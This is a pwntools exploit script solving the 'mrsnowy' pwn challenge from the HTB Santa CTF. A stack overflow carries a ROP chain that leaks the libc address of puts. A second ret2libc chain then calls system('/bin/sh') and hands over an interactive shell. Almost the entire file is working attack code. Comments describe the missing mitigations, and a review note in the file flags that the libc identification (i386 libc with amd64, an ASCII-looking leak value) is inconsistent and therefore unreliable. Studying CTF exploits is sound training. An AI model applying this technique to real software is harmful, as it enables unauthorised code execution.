htb-santa-ctf/pwn/mrsnowy/kabuttmache.py
2021-12-06 22:35:30 +01:00


#!/bin/env python
# Solution script for the HTB Santa CTF pwn challenge "mrsnowy" (see the path in
# the file header).  Flow as written below: overflow a stack buffer with a ROP
# chain that prints puts' GOT entry (a libc address), return into the program
# to overflow a second time, then call system("/bin/sh") from the now-known
# libc base.
#
# Defender's view: every stage leans on a mitigation that appears to be absent.
# A stack canary would likely abort before the overwritten return address is
# used; PIE would randomise elf.symbols/elf.got so the first chain could not be
# built from fixed addresses; and the leak stage exists only because libc's
# ASLR base has to be recovered at run time.
from pwn import *
context.arch = 'amd64'
# Bytes of filler placed before each ROP chain.  Per the author's analysis this
# is the distance from the overflowed buffer to the saved return address; the
# binary is not shown here, so this cannot be confirmed from this file alone.
offset = 0x48
elf = ELF('./mr_snowy')
p = elf.process()
# navigate to the affected read()
def do_read():
    """Drain process output until a chunk containing a b'>' prompt marker arrives."""
    while True:
        ll = p.read()
        if b'>' in ll:
            break
# Stage 1 chain: puts(got['puts']) writes the resolved libc address of puts to
# stdout, then control goes to investigate() -- presumably the function that
# contains the vulnerable read(), so the overflow can be triggered again.
rop = ROP(elf)
rop.call(elf.symbols['puts'], [elf.got['puts']])
rop.call(elf.symbols['investigate'])
# assemble payload
payload = [
    b'\xAA'*offset,
    rop.chain()
]
# skip menu
do_read()
p.sendline(b'1')
do_read()
# send payload
p.sendline(b''.join(payload))
# The leaked line is read up to the newline, stripped of trailing whitespace,
# zero-padded to 8 bytes and decoded as a little-endian 64-bit value.
puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
log.info(f'puts found at {hex(puts)}')
# Note:
# libc database search for puts address: 0x6d31333b315b1b20
# -> libc6_2.19-18+deb8u10_i386
# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
# NOTE(review): an i386 libc build paired with context.arch = 'amd64' looks
# inconsistent, and every byte of the value recorded above is printable ASCII,
# which is unusual for a libc pointer -- the leak and the resulting libc
# identification should be re-checked before the symbol offsets below are
# trusted.
libc = ELF("libc6_2.19-18+deb8u10_i386.so")
# Rebase the libc ELF on the leaked address so symbol/search results become
# runtime addresses for this process.
libc.address = puts - libc.symbols["puts"]
log.info(f'libc base address determined {hex(libc.address)}')
# Stage 2 chain (ret2libc): puts("/bin/sh") -- presumably a visible sanity
# check that the string address is right -- then system("/bin/sh"), then
# exit() so the process ends cleanly once the shell closes.
rop = ROP(libc)
rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('exit')
# assemble payload
payload = [
    b'\xAA'*offset,
    rop.chain()
]
p.sendline(b''.join(payload))
p.interactive()